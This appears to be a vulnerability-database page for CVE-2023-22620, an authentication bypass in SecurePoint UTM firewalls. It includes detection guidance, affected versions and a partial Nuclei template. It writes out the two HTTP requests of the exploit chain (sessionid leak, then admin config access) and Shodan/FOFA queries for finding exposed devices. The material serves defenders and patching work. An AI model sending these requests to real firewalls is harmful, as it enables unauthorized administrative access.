CVE-2023-22620
published 2023-04-12CVE-2023-22620: An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid…
PriorityP180high7.5CVSS 3.1
AVNACHPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.89%
88.9th percentile
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| securepoint | unified_threat_management | >= 12.2.3.1 < 12.2.5.1 | 12.2.5.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /spcgi.cgi HTTP/1.1
Content-Type: application/json; charset=UTF-8
{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}↗
commandPOST /spcgi.cgi HTTP/1.1
Content-Type: application/json; charset=UTF-8
{"module":"system","command":["config","get"],"sessionid":"{{session}}"}↗
yara↗
regex: '"sessionid": "([a-z0-9]+)"'
- →Monitor for POST requests to /spcgi.cgi with an empty 'sessionid', 'user', and 'pass' in the JSON body — this is the first stage of the exploit that triggers session ID disclosure. ↗
- →Detect a follow-up POST to /spcgi.cgi with module 'system' and command 'config get' using a sessionid obtained from the prior unauthenticated request — this indicates authentication bypass. ↗
- →A JSON response containing '"status":"OK"' from /spcgi.cgi following an unauthenticated login attempt confirms successful authentication bypass. ↗
- →Use Shodan/FOFA queries to identify exposed SecurePoint UTM instances: Shodan title:"Securepoint UTM", FOFA title="securepoint utm", Google intitle:"securepoint utm". ↗
- ·The vulnerability affects SecurePoint UTM versions before 12.2.5.1 only; patched versions are not susceptible. ↗
- ·The exploit is a two-step process: first an invalid authentication attempt leaks a sessionid, then that sessionid is reused to access the administrative interface — single-request detections will miss the full attack chain. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-84pv-v7vg-7784: An issue was discovered in SecurePoint UTM before 12
ghsa_unreviewed·2023-04-13
CVE-2023-22620 [HIGH] CWE-863 GHSA-84pv-v7vg-7784: An issue was discovered in SecurePoint UTM before 12
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
VulnCheck
securepoint unified_threat_management Incorrect Authorization
vulncheck·2023·CVSS 7.5
CVE-2023-22620 [HIGH] securepoint unified_threat_management Incorrect Authorization
securepoint unified_threat_management Incorrect Authorization
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
Affected: securepoint unified_threat_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-22620; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=202
No detection rules found.
Nuclei
SecurePoint UTM 12.x Session ID Leak
nuclei·CVSS 7.5
CVE-2023-22620 [HIGH] SecurePoint UTM 12.x Session ID Leak
SecurePoint UTM 12.x Session ID Leak
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
Template:
id: CVE-2023-22620
info:
name: SecurePoint UTM 12.x Session ID Leak
author: DhiyaneshDK
severity: high
description: |
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
impact: |
Successful exploitation of this vulnera
No writeups or analysis indexed.
http://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.htmlhttp://seclists.org/fulldisclosure/2023/Apr/7https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txthttps://rcesecurity.comhttp://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.htmlhttp://seclists.org/fulldisclosure/2023/Apr/7https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txthttps://rcesecurity.com
2023-04-12
Published
Exploited in the wild